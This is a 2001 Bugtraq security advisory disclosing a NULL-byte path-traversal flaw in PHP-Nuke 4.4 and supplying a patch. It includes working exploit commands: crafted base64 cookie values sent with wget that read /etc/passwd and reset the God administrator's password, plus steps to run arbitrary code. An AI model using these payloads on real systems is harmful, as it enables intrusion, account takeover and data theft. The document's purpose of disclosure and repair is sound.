[LWN Logo]
[LWN.net]
Date:         Sat, 24 Feb 2001 01:44:05 -0000
From: Joao Gouveia <tharbad@KAOTIK.ORG>
Subject:      Yet another hole in PHP-Nuke
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

This is yet another security flaw in PHP-Nuke, greatly inpired by RFP
post do bugtraq (http://www.securityfocus.com/archive/1/162703).

Tested on:
PHP-Nuke v.4.4 (latest version, step-by-step install)
PHP Version 4.0.4pl1

Impact: Any user can gain administrator previleges. Every file that the
webserver has access to, can be read by anyone. Any user can execute
arbitrary
commands
with the previleges of the web server.

Fix: version 4.4.1 has been released, for a quick fix see below

Facts:
PHP in some functions, like for example fopen(), include(), require(),
ignores everything after a NULL if one is present.
<snip php.ini>
magic_quotes_gpc = On ; magic quotes for incoming GET/POST/Cookie data
</snip>
Example:
<? echo $string?>

test.php?string=tes%00t
output:tes\0t

now, with magic_quotes_gpc turned Off.
output:test

The same two tests aplied to an include($string)
magic_quotes_gpc On, output: Warning: Failed opening 'tes\0t' for
inclusion
magic_quotes_gpc Off, output: Warning: Failed opening 'tes' for
inclusion
So, everything after the NULL was ignored.

Of course, one that who uses magic_quotes_gpc turned on isn't expecting this
kind of behaviour.
The problem here, as RFP noted in his post to bugtraq, is that PHP-Nuke
uses base64_encode() to encode it's cookies, and the user information.
In this vars there is a interesting one, the theme configuration ( also
pointed out by RFP ). The same thing that makes phpnuke not escape the '
, also makes it not escape the NULL. So, here's an example:
<snip of bb_smilies.php> (Note: 'bbcode_ref.php' has the same problem)
if ($user) {
                $user = base64_decode($user);
                $userdata = explode(":", $user);
}

if ($userdata[9] != '') $themes = "themes/$userdata[9]/theme.php";
else $themes = "themes/$Default_Theme/theme.php";

include ("$themes");
</snip>

Here's a simple way to get /etc/passwd:
<quote>
jroberto@spike:~ > /bin/echo -e
"1:1:1:1:1:1:1:1:1:../../../../../etc/passwd\000" |uuencode -m f
begin-base64 644 f
MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK
jroberto@spike:~ > wget
'http://target/bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vL
i4vZXRjL3Bhc3N3ZAAK'
-O target.passwd
jroberto@spike:~ > head -n1 target.passwd
root:x:0:0:root:/root:/bin/bash
</quote>

And, with a litle imagination, here's another way to change the default
administrator (God) password:
<quote>
jroberto@spike:~ > /bin/echo -e
"1:1:1:1:1:1:1:1:1:../admin/authors.php\000">lixo
jroberto@spike:~ > uuencode -m lixo lixo2
begin-base64 644 lixo2
MToxOjE6MToxOjE6MToxOjE6Li4vYWRtaW4vYXV0aG9ycy5waHAACg==
jroberto@spike:~ > wget
'http://target/bb_smilies.php/admin.php?user=1ToxOjE6MToxOjE6MToxOjE6Li4vYWR
taW4vYXV0aG9ycy5waHAACg==&op=UpdateAuthor&chng_aid=God&chng_pwd=newpass&chng
_name=God&chng_email=qweqwe@asdasd&chng_pwd2=newpass'
-O test
</quote>

And here's a simple way to execute arbitrary code on the server ( given that
it's not running in safe_mode and filemanager is working).
After geting administration previleges, go to the admin area and give "God"
superuser privs ( if it isn't enabled ).
Switch to the File Manager area, edit/create/rename your choosen file and
insert your php code there.

Fix:

Both in bb_smilies.php and bbcode_ref.php change:
<quote>
if ($userdata[9] != '') $themes = "themes/$userdata[9]/theme.php";
else $themes = "themes/$Default_Theme/theme.php";
</quote>

To:

<quote>
if ($userdata[9] != '') $themes = "themes/$userdata[9]/theme.php";
else $themes = "themes/$Default_Theme/theme.php";
if ( !(strstr(basename($themes),"theme.php")) || !(file_exists($themes)) ){
echo "Invalid Theme"; exit;}
include ("$themes");
</quote>

Best regards,

Joao Gouveia
------------
tharbad@kaotik.org